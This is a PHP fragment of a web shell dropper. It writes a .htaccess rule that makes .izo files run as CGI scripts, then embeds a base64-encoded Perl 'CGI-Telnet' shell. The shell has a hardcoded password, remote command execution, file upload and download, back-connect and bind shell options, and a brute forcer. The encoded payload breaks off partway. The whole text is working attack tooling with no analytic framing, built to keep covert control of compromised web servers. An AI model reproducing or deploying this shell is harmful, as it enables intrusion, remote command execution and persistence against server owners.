        echo "<center/><br/><b>\r\n +--==[ CGI-Telnet Version 1.3 ]==--+ \r\n </b><br><br>";
        mkdir('cgi2012', 0755);
        chdir('cgi2012');
        $kokdosya = ".htaccess";
        $dosya_adi = ".htaccess";
        $dosya = fopen($dosya_adi, 'w') or die("Dosya a&#231;&#305;lamad&#305;!");
        $metin = "AddHandler cgi-script .izo";
        fwrite($dosya, $metin);
        fclose($dosya);
        $cgi2012 = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCnVzZSBNSU1FOjpCYXNlNjQ7CiRWZXJzaW9uPSAiQ0dJLVRlbG5ldCBWZXJzaW9uIDEuMyI7CiRFZGl0UGVyc2lvbj0iPGZvbnQgc3R5bGU9J3RleHQtc2hhZG93OiAwcHggMHB4IDZweCByZ2IoMjU1LCAwLCAwKSwgMHB4IDBweCA1cHggcmdiKDMwMCwgMCwgMCksIDBweCAwcHggNXB4IHJnYigzMDAsIDAsIDApOyBjb2xvcjojZmZmZmZmOyBmb250LXdlaWdodDpib2xkOyc+YjM3NGsgLSBDR0ktVGVsbmV0PC9mb250PiI7CgokUGFzc3dvcmQgPSAiYmFuZHVuZ2tvdGFzYW1wYWgiOwkJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4Kc3ViIElzX1dpbigpewoJJG9zID0gJnRyaW0oJEVOVnsiU0VSVkVSX1NPRlRXQVJFIn0pOwoJaWYoJG9zID1+IG0vd2luL2kpewoJCXJldHVybiAxOwoJfQoJZWxzZXsKCQlyZXR1cm4gMDsKCX0KfQokV2luTlQgPSAmSXNfV2luKCk7CQkJCSMgWW91IG5lZWQgdG8gY2hhbmdlIHRoZSB2YWx1ZSBvZiB0aGlzIHRvIDEgaWYKCQkJCQkJCQkjIHlvdSdyZSBydW5uaW5nIHRoaXMgc2NyaXB0IG9uIGEgV2luZG93cyBOVAoJCQkJCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkJCQkJIyBjYW4gbGVhdmUgdGhlIHZhbHVlIGFzIGl0IGlzLgoKJE5UQ21kU2VwID0gIiYiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gV2luZG93cyBOVC4KCiRVbml4Q21kU2VwID0gIjsiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gVW5peC4KCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTAwMDA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkCgkJCQkJCQkJIyBEb24ndCBzZXQgdGhpcyB0byBhIHZlcnkgbGFyZ2UgdmFsdWUuIFRoaXMgaXMKCQkJCQkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLgoJCQkJCQkJCSMgVGhpcyBpcyB2YWxpZCBvbmx5IG9uIFVuaXggc2VydmVycy4gSXQgaXMKCQkJCQkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkJIyBJZiB0aGlzIGlzIDEsIHRoZW4gZGF0YSBpcyBzZW50IHRvIHRoZQoJCQkJCQkJCSMgYnJvd3NlciBhcyBzb29uIGFzIGl0IGlzIG91dHB1dCwgb3RoZXJ3aXNlCgkJCQkJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkJCQkJIyBjb21wbGV0ZXMuIFRoaXMgaXMgdXNlZnVsIGZvciBjb21tYW5kcyBsaWtlCgkJCQkJCQkJIyBwaW5nLCBzbyB0aGF0IHlvdSBjYW4gc2VlIHRoZSBvdXRwdXQgYXMgaXQKCQkJCQkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwokY29scz0gMTUwOwokcm93cz0gMjY7CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBSZWFkcyB0aGUgaW5wdXQgc2VudCBieSB0aGUgYnJvd3NlciBhbmQgcGFyc2VzIHRoZSBpbnB1dCB2YXJpYWJsZXMuIEl0CiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlwYXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4KIyBUaGUgZmlsZW5hbWUgaXMgc3RvcmVkIGluICRpbnsnZid9IGFuZCB0aGUgZGF0YSBpcyBzdG9yZWQgaW4gJGlueydmaWxlZGF0YSd9LgojIE90aGVyIHZhcmlhYmxlcyBjYW4gYmUgYWNjZXNzZWQgdXNpbmcgJGlueyd2YXInfSwgd2hlcmUgdmFyIGlzIHRoZSBuYW1lIG9mCiMgdGhlIHZhcmlhYmxlLiBOb3RlOiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBDR0kKIyBzY3JpcHRzLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBSZWFkUGFyc2UgCnsKCWxvY2FsICgqaW4pID0gQF8gaWYgQF87Cglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOwoJCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsKCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQoJewoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9OwoJfQoJZWxzaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpCgl7CgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOwoJCXJlYWQoU1RESU4sICRpbiwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7Cgl9CgoJIyBoYW5kbGUgZmlsZSB1cGxvYWQgZGF0YQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pCgl7CgkJJEJvdW5kYXJ5ID0gJy0tJy4kMTsgIyBwbGVhc2UgcmVmZXIgdG8gUkZDMTg2NyAKCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyAKCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOwoJCSRIZWFkZXJCb2R5ID1+IC9cclxuXHJcbnxcblxuLzsKCQkkSGVhZGVyID0gJGA7CgkJJEJvZHkgPSAkJzsKIAkJJEJvZHkgPX4gcy9cclxuJC8vOyAjIHRoZSBsYXN0IFxyXG4gd2FzIHB1dCBpbiBieSBOZXRzY2FwZQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5OwoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgCgkJJGlueydmJ30gPSAkMTsgCgkJJGlueydmJ30gPX4gcy9cIi8vZzsKCQkkaW57J2YnfSA9fiBzL1xzLy9nOwoKCQkjIHBhcnNlIHRyYWlsZXIKCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQoJCXsgCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOwoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87CgkJCSRrZXkgPSAkMTsKCQkJJHZhbCA9ICQnOwoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gPSAkdmFsOyAKCQl9Cgl9CgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkKCXsKCQlAaW4gPSBzcGxpdCgvJi8sICRpbik7CgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQoJCXsKCQkJJGluWyRpXSA9fiBzL1wrLyAvZzsKCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsKCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7CgkJCSRpbnska2V5fSAuPSAkdmFsOwoJCX0KCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcgojIEFyZ3VtZW50IDE6IEZvcm0gaXRlbSBuYW1lIHRvIHdoaWNoIGZvY3VzIHNob3VsZCBiZSBzZXQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRQYWdlSGVhZGVyCnsKCSRFbmNvZGVkQ3VycmVudERpciA9ICRDdXJyZW50RGlyOwoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCW15ICRkaXIgPSRDdXJyZW50RGlyOwoJJGRpcj1+IHMvXFwvXFxcXC9nOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+Cjx0aXRsZT5IYWNzdWdpYTwvdGl0bGU+CgokSHRtbE1ldGFIZWFkZXIKCjwvaGVhZD4KPHN0eWxlPgpib2R5ewpmb250OiAxMHB0IFZlcmRhbmE7Cn0KdHIgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKY29sb3I6ICNmZjk5MDA7Cn0KdGQgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKY29sb3I6ICMyQkE4RUM7CmZvbnQ6IDEwcHQgVmVyZGFuYTsKfQoKdGFibGUgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKQkFDS0dST1VORC1DT0xPUjogIzExMTsKfQoKCmlucHV0IHsKQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7CkJBQ0tHUk9VTkQtQ09MT1I6IEJsYWNrOwpmb250OiAxMHB0IFZlcmRhbmE7CmNvbG9yOiAjZmY5OTAwOwp9CgppbnB1dC5zdWJtaXQgewp0ZXh0LXNoYWRvdzogMHB0IDBwdCAwLjNlbSBjeWFuLCAwcHQgMHB0IDAuM2VtIGN5YW47CmNvbG9yOiAjRkZGRkZGOwpib3JkZXItY29sb3I6ICMwMDk5MDA7Cn0KCmNvZGUgewpib3JkZXIJCQk6IGRhc2hlZCAwcHggIzMzMzsKQkFDS0dST1VORC1DT0xPUjogQmxhY2s7CmZvbnQ6IDEwcHQgVmVyZGFuYSBib2xkOwpjb2xvcjogd2hpbGU7Cn0KCnJ1biB7CmJvcmRlcgkJCTogZGFzaGVkIDBweCAjMzMzOwpmb250OiAxMHB0IFZlcmRhbmEgYm9sZDsKY29sb3I6ICNGRjAwQUE7Cn0KCnRleHRhcmVhIHsKQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7CkJBQ0tHUk9VTkQtQ09MT1I6ICMxYjFiMWI7CmZvbnQ6IEZpeGVkc3lzIGJvbGQ7CmNvbG9yOiAjYWFhOwp9CkE6bGluayB7CglDT0xPUjogIzJCQThFQzsgVEVYVC1ERUNPUkFUSU9OOiBub25lCn0KQTp2aXNpdGVkIHsKCUNPTE9SOiAjMkJBOEVDOyBURVhULURFQ09SQVRJT046IG5vbmUKfQpBOmhvdmVyIHsKCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsKCWNvbG9yOiAjZmY5OTAwOyBURVhULURFQ09SQVRJT046IG5vbmUKfQpBOmFjdGl2ZSB7Cgljb2xvcjogUmVkOyBURVhULURFQ09SQVRJT046IG5vbmUKfQoKLmxpc3RkaXIgdHI6aG92ZXJ7CgliYWNrZ3JvdW5kOiAjNDQ0Owp9Ci5saXN0ZGlyIHRyOmhvdmVyIHRkewoJYmFja2dyb3VuZDogIzQ0NDsKCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsKCWNvbG9yOiAjRkZGRkZGOyBURVhULURFQ09SQVRJT046IG5vbmU7Cn0KLm5vdGxpbmV7CgliYWNrZ3JvdW5kOiAjMTExOwp9Ci5saW5lewoJYmFja2dyb3VuZDogIzIyMjsKfQo8L3N0eWxlPgo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4KZnVuY3Rpb24gY2htb2RfZm9ybShpLGZpbGUpCnsKCS8qdmFyIGFqYXg9J2FqYXhfUG9zdERhdGEoIkZvcm1QZXJtc18nK2krJyIsIiRTY3JpcHRMb2NhdGlvbiIsIlJlc3BvbnNlRGF0YSIpOyByZXR1cm4gZmFsc2U7JzsqLwoJdmFyIGFqYXg9IiI7Cglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZVBlcm1zXyIraSkuaW5uZXJIVE1MPSI8Zm9ybSBuYW1lPUZvcm1QZXJtc18iICsgaSsgIiBhY3Rpb249JycgbWV0aG9kPSdQT1NUJz48aW5wdXQgaWQ9dGV4dF8iICsgaSArICIgIG5hbWU9Y2htb2QgdHlwZT10ZXh0IHNpemU9NSAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBjbGFzcz0nc3VibWl0JyBvbmNsaWNrPSciICsgYWpheCArICInIHZhbHVlPU9LPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7Cn0KZnVuY3Rpb24gcm1fY2htb2RfZm9ybShyZXNwb25zZSxpLHBlcm1zLGZpbGUpCnsKCXJlc3BvbnNlLmlubmVySFRNTCA9ICI8c3BhbiBvbmNsaWNrPVxcXCJjaG1vZF9mb3JtKCIgKyBpICsgIiwnIisgZmlsZSsgIicpXFxcIiA+IisgcGVybXMgKyI8L3NwYW4+PC90ZD4iOwp9CmZ1bmN0aW9uIHJlbmFtZV9mb3JtKGksZmlsZSxmKQp7Cgl2YXIgYWpheD0iIjsKCWYucmVwbGFjZSgvXFxcXC9nLCJcXFxcXFxcXCIpOwoJdmFyIGJhY2s9InJtX3JlbmFtZV9mb3JtKCIraSsiLFxcXCIiK2ZpbGUrIlxcXCIsXFxcIiIrZisiXFxcIik7IHJldHVybiBmYWxzZTsiOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9Ijxmb3JtIG5hbWU9Rm9ybVBlcm1zXyIgKyBpKyAiIGFjdGlvbj0nJyBtZXRob2Q9J1BPU1QnPjxpbnB1dCBpZD10ZXh0XyIgKyBpICsgIiAgbmFtZT1yZW5hbWUgdHlwZT10ZXh0IHZhbHVlPSAnIitmaWxlKyInIC8+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBhamF4ICsgIicgdmFsdWU9T0s+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBiYWNrICsgIicgdmFsdWU9Q2FuY2VsPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7Cn0KZnVuY3Rpb24gcm1fcmVuYW1lX2Zvcm0oaSxmaWxlLGYpCnsKCWlmKGY9PSdmJykKCXsKCQlkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZV8iK2kpLmlubmVySFRNTD0iPGEgaHJlZj0nP2E9Y29tbWFuZCZkPSRkaXImYz1lZGl0JTIwIitmaWxlKyIlMjAnPiIgK2ZpbGUrICI8L2E+IjsKCX1lbHNlCgl7CgkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9IjxhIGhyZWY9Jz9hPWd1aSZkPSIrZisiJz5bICIgK2ZpbGUrICIgXTwvYT4iOwoJfQp9Cjwvc2NyaXB0Pgo8Ym9keSBvbkxvYWQ9ImRvY3VtZW50LmYuQF8uZm9jdXMoKSIgYmdjb2xvcj0iIzBjMGMwYyIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIj4KPGNlbnRlcj48Y29kZT4KPHRhYmxlIGJvcmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+Cjx0cj4KCTx0ZCBhbGlnbj0iY2VudGVyIiByb3dzcGFuPTI+CgkJPGI+PGZvbnQgc2l6ZT0iNSI+JEVkaXRQZXJzaW9uPC9mb250PjwvYj4KCTwvdGQ+CgoJPHRkPgoKCQk8Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4kRU5WeyJTRVJWRVJfU09GVFdBUkUifTwvZm9udD4KCTwvdGQ+Cgk8dGQ+U2VydmVyIElQOjxmb250IGNvbG9yPSIjY2MwMDAwIj4gJEVOVnsnU0VSVkVSX0FERFInfTwvZm9udD4gfCBZb3VyIElQOiA8Zm9udCBjb2xvcj0iIzAwMDAwMCI+JEVOVnsnUkVNT1RFX0FERFInfTwvZm9udD4KCTwvdGQ+Cgo8L3RyPgoKPHRyPgo8dGQgY29sc3Bhbj0iMyI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbiI+SG9tZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Y29tbWFuZCZkPSRFbmNvZGVkQ3VycmVudERpciI+Q29tbWFuZDwvYT4gfAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1ndWkmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkdVSTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWJhY2tiaW5kIj5CYWNrICYgQmluZDwvYT4gfAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1icnV0ZWZvcmNlciI+QnJ1dGUgRm9yY2VyPC9hPiB8CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWNoZWNrbG9nIj5DaGVjayBMb2c8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG9tYWluc3VzZXIiPkRvbWFpbnMvVXNlcnM8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5Mb2dvdXQ8L2E+IHwKPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9IiMiPkhlbHA8L2E+Cgo8L2ZvbnQ+PC90ZD4KPC90cj4KPC90YWJsZT4KPGZvbnQgaWQ9IlJlc3BvbnNlRGF0YSIgY29sb3I9IiNmZjk5Y2MiID4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCglwcmludCA8PEVORDsKPHByZT48c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+ClR5cGluZ1RleHQgPSBmdW5jdGlvbihlbGVtZW50LCBpbnRlcnZhbCwgY3Vyc29yLCBmaW5pc2hlZENhbGxiYWNrKSB7CiAgaWYoKHR5cGVvZiBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCA9PSAidW5kZWZpbmVkIikgfHwgKHR5cGVvZiBlbGVtZW50LmlubmVySFRNTCA9PSAidW5kZWZpbmVkIikpIHsKICAgIHRoaXMucnVubmluZyA9IHRydWU7CS8vIE5ldmVyIHJ1bi4KICAgIHJldHVybjsKICB9CiAgdGhpcy5lbGVtZW50ID0gZWxlbWVudDsKICB0aGlzLmZpbmlzaGVkQ2FsbGJhY2sgPSAoZmluaXNoZWRDYWxsYmFjayA/IGZpbmlzaGVkQ2FsbGJhY2sgOiBmdW5jdGlvbigpIHsgcmV0dXJuOyB9KTsKICB0aGlzLmludGVydmFsID0gKHR5cGVvZiBpbnRlcnZhbCA9PSAidW5kZWZpbmVkIiA/IDEwMCA6IGludGVydmFsKTsKICB0aGlzLm9yaWdUZXh0ID0gdGhpcy5lbGVtZW50LmlubmVySFRNTDsKICB0aGlzLnVucGFyc2VkT3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0OwogIHRoaXMuY3Vyc29yID0gKGN1cnNvciA/IGN1cnNvciA6ICIiKTsKICB0aGlzLmN1cnJlbnRUZXh0ID0gIiI7CiAgdGhpcy5jdXJyZW50Q2hhciA9IDA7CiAgdGhpcy5lbGVtZW50LnR5cGluZ1RleHQgPSB0aGlzOwogIGlmKHRoaXMuZWxlbWVudC5pZCA9PSAiIikgdGhpcy5lbGVtZW50LmlkID0gInR5cGluZ3RleHQiICsgVHlwaW5nVGV4dC5jdXJyZW50SW5kZXgrKzsKICBUeXBpbmdUZXh0LmFsbC5wdXNoKHRoaXMpOwogIHRoaXMucnVubmluZyA9IGZhbHNlOwogIHRoaXMuaW5UYWcgPSBmYWxzZTsKICB0aGlzLnRhZ0J1ZmZlciA9ICIiOwogIHRoaXMuaW5IVE1MRW50aXR5ID0gZmFsc2U7CiAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiI7Cn0KVHlwaW5nVGV4dC5hbGwgPSBuZXcgQXJyYXkoKTsKVHlwaW5nVGV4dC5jdXJyZW50SW5kZXggPSAwOwpUeXBpbmdUZXh0LnJ1bkFsbCA9IGZ1bmN0aW9uKCkgewogIGZvcih2YXIgaSA9IDA7IGkgPCBUeXBpbmdUZXh0LmFsbC5sZW5ndGg7IGkrKykgVHlwaW5nVGV4dC5hbGxbaV0ucnVuKCk7Cn0KVHlwaW5nVGV4dC5wcm90b3R5cGUucnVuID0gZnVuY3Rpb24oKSB7CiAgaWYodGhpcy5ydW5uaW5nKSByZXR1cm47CiAgaWYodHlwZW9mIHRoaXMub3JpZ1RleHQgPT0gInVuZGVmaW5lZCIpIHsKICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsJLy8gV2UgaGF2ZW4ndCBmaW5pc2hlZCBsb2FkaW5nIHlldC4gIEhhdmUgcGF0aWVuY2UuCiAgICByZXR1cm47CiAgfQogIGlmKHRoaXMuY3VycmVudFRleHQgPT0gIiIpIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgPSAiIjsKLy8gIHRoaXMub3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0LnJlcGxhY2UoLzwoW148XSkqPi8sICIiKTsgICAgIC8vIFN0cmlwIEhUTUwgZnJvbSB0ZXh0LgogIGlmKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCkgewogICAgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIjwiICYmICF0aGlzLmluVGFnKSB7CiAgICAgIHRoaXMudGFnQnVmZmVyID0gIjwiOwogICAgICB0aGlzLmluVGFnID0gdHJ1ZTsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIj4iICYmIHRoaXMuaW5UYWcpIHsKICAgICAgdGhpcy50YWdCdWZmZXIgKz0gIj4iOwogICAgICB0aGlzLmluVGFnID0gZmFsc2U7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy50YWdCdWZmZXI7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMuaW5UYWcpIHsKICAgICAgdGhpcy50YWdCdWZmZXIgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICImIiAmJiAhdGhpcy5pbkhUTUxFbnRpdHkpIHsKICAgICAgdGhpcy5IVE1MRW50aXR5Q